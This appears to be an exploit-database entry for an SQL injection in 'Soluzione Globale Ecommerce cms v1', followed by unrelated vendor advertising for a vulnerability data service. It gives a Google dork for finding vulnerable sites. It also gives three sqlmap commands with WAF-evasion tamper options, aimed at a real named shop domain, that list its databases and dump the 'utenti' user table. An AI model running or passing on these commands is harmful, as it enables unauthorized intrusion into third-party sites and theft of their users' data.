`# Exploit Title: Soluzione Globale Ecommerce cms v1 SQL Injection Vulnerability
# Google Dork: intext:" Soluzione Globale s.r.l.s. " +inurl:/.php?id=
# Date: 2020-03-24
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.soluzioneglobale.com/
# Version: v1
# Tested on: Ubuntu
---------------------------------------------------------
PoC 1:
the attacker once locate the sql vulnerability can perform an automated process to exploit the secruity in the webapp , in this case using sqlmap in 2 steps only
*Note: once you get the db name you can skip the other steps and directly get "utenti" data (you can use command 1 and 3 ..below)
Payload(s)
http://www.site.com/offerta.php?id=[]'[SQL INJECTION VULNERABILITY!]
SQLMAP Payload(s):
sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D Sql1125953_1 --tables
sqlmap -u https://www.habitat-arredamenti.it/offerta.php?id=722 --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dump -D Sql1125953_1 -T utenti
Greetings:
*indoushka*
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation